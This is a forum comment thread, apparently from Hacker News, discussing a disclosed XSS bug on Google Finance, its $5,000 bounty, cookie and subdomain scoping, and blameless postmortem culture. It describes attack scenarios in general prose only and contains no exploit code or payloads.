Does anyone else feel that XSS on google.com is probably worth a bit more to the wrong people than $5k? Arbitrary-eval is pretty much the worst. Unless I'm missing something, somebody could steal a user's cookie strings and post them to an arbitrary endpoint, which could then use them to log into, e.g. GMail, which an attacker could then use to trigger and retrieve password-reset links for all sorts of other sites.
When I worked at Yahoo, an XSS on yahoo.com (which almost never happened) was a code-red, drop-everything, holy-shit event. If I were at Google I'd probably give this guy a bonus.
In addition to the session ID cookies, you need the HSID cookie as well, which is HttpOnly. While this type of bug is bad, it doesn't allow for a malicious third party to get all of the cookies needed to take over the users session.
Why bother with session cookies when you can just throw up an official-looking login dialog on the google.com domain and just steal credentials from everyone not aware enough?
I use Google Finance, Yahoo Finance, Marketwatch, Bloomberg and the WSJ stock pages very frequently and can confirm that Google Finance was on finance.google.com until quite recently. Pretty sure it was there earlier this year.
Yes, but Google Finance is on google.com/finance (for some reason; I'm sure it used to be finance.google.com at some point...).
Cookies set for just subdomain.hostname.com can only be "seen by" that particular subdomain, while cookies set for hostname.com can be seen from hostname.com and any and all subdomains. I think that's why they do it constantly, at least stuff like www.google.com/glass certainly makes no sense otherwise. Why not make a fancy new domain for that? I think it's cookie greed.
cookie greed doesn't explain it, because they don't issue any cookies for www.google.com, or at least, I don't have any; they do issue cookies for .google.com, which www and finance can access equally. It's either a branding thing, or a they paid for the fancy load balancer so they're going to use it thing.
That's a good point, I stand corrected. Of course, if you wanted to be "minimal" about cookies, you'd have to use a subdomain, but using one doesn't mean anything by itself.
The cookie scenario is not really practical since you can prevent javascript from reading cookies with httponly and I could bet a lot google uses httponly cookies where it matters.
The real threats I imagine is social engineering it enables or running code on the users' machines through browser plugin vulnerabilities. Also, running signed Java with a fake certificate is just a dialog confirmation from the user.
I wonder if emailing them and asking for e.g. a 25k reward before disclosure exposes one to criminal liability or not.
I mean, is there a law making it illegal to sell exploits to the black market? These bug bounty programs must know they compete with a large market for these sorts of things.
I think the goal of the $5000 is not to discourage criminals, but rather to encourage someone who notices an issue to write it up, produce a test case, bother to send an email to security@, and then follow up rather than just say "LOL, idiots" and move on with their life.
The $5000 is also a nice incentive to keep looking around.
Not always. For example, speaking truthful factual statements with malicious intent to harm someone's business by damaging their reputation is totally legal, provided you're not defrauding or blackmailing anyone or otherwise acting sketchy.
There're a lot of actions based on malicious intent that are (and should remain) legal.
Slightly off topic, but if a bug like this is discovered does the engineer who wrote it get notified?
It would be funny to have a sort of wall of shame for that week or something else internally. Or you could even go as far as making that engineer pay for the bug bounty (that's a bit much though). Anyone have any experience as to what happens on Google's end besides the obviously patching of the bug and paying of the fine?
A wall of shame sounds amusing at first blush, but it would quickly become a source of a lot of negativity and unhappiness. Yes, developers need to be aware of bugs, and learn from mistakes, but intentional harassment seems a step too far. I know I've written thousands of bugs.
A friend that used to work at Apple once told me a story of their department having a big banner over the desk of the last person to broke the build. Eventually a frustrated recipient of the banner solved the problems causing it to be brittle in the first place, and as a result had the banner himself for months. A rather unexpected disincentive to solve the problem
I agree it can definitely turn counter-productive quickly. On the other hand, if not a wall of shame, I would like to know what happened if it was my code.
It might be funny but I can't imagine that shaming engineers like that would be very productive. Anyone talented enough to be working at a place like Google is likely going to be plenty embarrassed without a "wall of shame" to make sure everyone knows who screwed up.
Not a Google employee but I'd imagine they'd have to do some kind of writeup about what happened/how future errors like this will be prevented.
But whose fault is it? Is it the programmers fault for writing the bug? Or is it the QA's fault for missing the bug? Or was it the leads fault for signing off on buggy code?
You can point the blame at a lot of people, but in the end it's highly unproductive and a waste of time. You fix the bug and move on. If programming teams played the blame game every time a bug came up, it would just slow everyone down.
All very good questions. I was wasn't thinking about it as the blame game though, but I do see how it could quickly become that.
I was thinking, firstly, along the lines of having some ammo to make fun of people with (insult based humor is the basis for most of my relationships with people). Also, on a more practical note, as a developer myself I would like to know when my code breaks and why.
Actually there was (probably still is) an internal newsletter from the security team on the latest stuff that anyone who does anything customer facing should read. I really enjoyed reading it, both the writing was creative (engaging as opposed to obfuscating :-) and the topics sort of like logic puzzles.
It's not particularly constructive to think of individuals as being responsible for single bugs. Bugs are random events, and their probability increases as people and processes become complacent.
A good way to react to this bug is to come up with ideas for reducing the possibility of future bugs: static analysis tools, making code reviews easier, and so on. One might also think up ways to lower the impact of future bugs; make session cookies unavailable to JavaScript, propose new standards for the web, etc.
It's important to think of it from a statistical standpoint. Given two equally skilled developers, the one that implements more features is more likely to be involved in a production incident. If we punish people for bugs, we're punishing productivity in addition to sloppiness. That sets the incentives incorrectly. It isn't even a good idea to blame one person: if you scare one person into compliance, you still have the 29,999 other SWEs that aren't scared into compliance. Much better to develop tools that make bugs easier to spot, because every hour you spend doing that helps 29,999x as many people.
Disclaimer: I wasn't involved in this particular bug at all so I'm speaking generally.
We definitely don't play the blame game but we do keep track of bug statistics so we know where best to spend our time and effort. It can be useful to know that projects using framework X have more issues than framework Y or that maybe we should arrange to run some security classes at office Z.
Bugs like this one are fixed with the help of the product team, they're usually the ones writing and pushing the fix (since they know the project best) and it's a good way to get some practical security experience spread around the organization (and increase awareness).
We do write post-mortems for serious issues to delve into the root cause and to help stop it from happening again. We have a lot of initiatives in place to improve the security of our products overall through both awareness raising (training, newsletters, security puzzles) and technology changes (scanners, static analysis, framework hardening).
P.S We're always looking for security people to join us at Google (send me your resume, email in profile) or by bug hunting for bugs to submit to our vulnerability reward program.
Praise your employees in public. Correct them in private.
People like to be lauded for their accomplishments, but nobody wants to be known as "that guy who wrote a severe XSS bug."
Build babysitters are a bit of an exception, since it's not the end of the world if the current build is broken - another commit, and the problem's resolved. Public XSS though... that's more severe.
That's needlessly vicious. You don't need a wall of shame. Just report the bug back to the original programmer and they'll feel bad enough as it is.
Also, generally speaking, it's not one person's fault. At the very least they also have a reviewer who should have caught it.
What actually happens in a healthy organization is that someone writes a postmortem going through all the steps leading to the bad outcome, along with a plan to make fixes at multiple levels to make sure nothing like it happens again.
I hope that the engineer(s) that wrote it get notified, so that they get the feedback on their decisions. If I write code with bugs that make it to production, I'd sure would like to know, even if I'm not the one fixing it.
(This is the major reason why I think having sustaining/continuing engineering departments in software companies is a bad idea).
I'm not familiar with Google Finance, but the author states "This part of the code is responsible for querying an external domain for a newsfeed to be displayed on the plot as an overlay.". I'm guessing they just happened to come across a Google Finance URL using the &ntrssurl= parameter and figured that would be worth digging into.
He says also in the comments:
"Manual testing, the ntrssurl parameter was present in an example in the documentation for adding custom news feeds to the plot :) ."
It really wouldn't, URL's like this in parameters are a huge red flag for both humans and automated tools. Any half decent analyzer would just need to see that parameter in any page it scraped.
When I worked at Yahoo, an XSS on yahoo.com (which almost never happened) was a code-red, drop-everything, holy-shit event. If I were at Google I'd probably give this guy a bonus.